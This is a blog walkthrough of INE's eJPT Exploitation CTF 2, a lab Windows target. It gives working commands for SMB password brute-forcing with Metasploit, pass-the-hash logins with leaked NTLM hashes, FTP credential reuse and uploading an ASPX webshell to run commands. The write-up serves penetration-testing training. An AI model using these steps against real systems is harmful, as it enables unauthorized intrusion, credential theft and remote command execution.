Host & Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)
A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webs 2026-7-4 04:37:5 Author: infosecwriteups.com(查看原文) 阅读量:8 收藏

A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.

Suraj Apar

Press enter or click to view image in full size

Hello everyone!

In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefully, each one actually unlocks the answer for the next. The lab is designed as a chain, and once you spot that pattern it flows naturally from start to finish.

So, let’s dive in.

Q. Looks like SMB user tom has not changed his password from a very long time.

As usual, I started with an Nmap scan and opened Metasploit in parallel:

nmap -T4 -sV -O -sC target.ine.local
service postgresql start && msfconsole -q -x "workspace -a win"

Press enter or click to view image in full size

The scan revealed several open ports — FTP on 21, HTTP on 80, SMB on 445, and RDP on 3389. The question was pointing directly at SMB and a user called tom with a weak password, so I loaded the smb_login auxiliary module and brute-forced it against the provided wordlist:

use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser tom
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
run

Press enter or click to view image in full size

Got it. With valid credentials, I listed the available SMB shares using smbmap:

smbmap -H target.ine.local -u tom -p <password>

Press enter or click to view image in full size

Tom had read access to HRDocuments. I connected and listed the contents:

smbclient //target.ine.local/HRDocuments -U tom --password <password>
smb: \> ls

Press enter or click to view image in full size

Two files — flag1.txt and leaked-hashes.txt. Flag 1 captured, and the hashes file was clearly the hint for the next question.

Q. Using the NTLM hash list discovered in the previous challenge, can you compromise the SMB user nancy?

The leaked hashes file contained multiple NTLM hashes. The question pointed at user nancy, so instead of cracking the hashes I went straight to a Pass-the-Hash attack — using the hashes directly against SMB:

use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser nancy
set pass_file leaked-hashes.txt
run

Press enter or click to view image in full size

One hash matched. For SMB authentication the format is <LM_HASH>:<NT_HASH> — only the NT portion matters. I used it to connect directly with --pw-nt-hash:

smbclient //target.ine.local/ITResources -U nancy --pw-nt-hash <NT_hash>
smb: \> ls

Press enter or click to view image in full size

Two files inside — flag2.txt and hint.txt. Flag 2 captured. I grabbed the hint file:

smb: \> get hint.txt

Q. I wonder what the hint found in the previous challenge could be useful for!

I opened the hint file:

cat hint.txt

It contained a set of credentials for a user called david. The Nmap scan had shown FTP open on port 21, so I tried them there:

ftp ftp://david:<password>@target.ine.local

Press enter or click to view image in full size

Logged in. Listing the FTP directory showed flag3.txt sitting right there alongside the default IIS files. Flag 3 captured.

Q. Can you compromise the target machine and retrieve the C:\flag4.txt file?

Still in the FTP session — and the FTP root appeared to be the IIS web root (same iisstart.htm and iis-85.png from the default IIS page). That meant anything uploaded via FTP would be accessible directly from the web server.

Get Suraj Apar’s stories in your inbox

Join Medium for free to get updates from this writer.

Remember me for faster sign in

I uploaded an ASPX webshell:

ftp> put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx

Press enter or click to view image in full size

Then opened it in the browser:

http://target.ine.local/cmd.aspx

The webshell gave me a command input field. I ran:

type C:\flag4.txt

Press enter or click to view image in full size

Flag 4 returned directly in the browser.

Final Thoughts

This CTF was well designed — each flag handed you exactly what you needed for the next one. Tom’s weak password gave the NTLM hashes. The hashes gave nancy’s access. Nancy’s share gave david’s credentials. David’s FTP session gave webshell upload, and the webshell gave the final flag.

The Pass-the-Hash step was the most interesting technically. You never need to crack an NTLM hash to use it — Windows authentication accepts the hash directly, which means a leaked hash file is often as good as a plaintext password list.

Thanks for reading!


文章来源: https://infosecwriteups.com/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine-77fea8b4433d?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh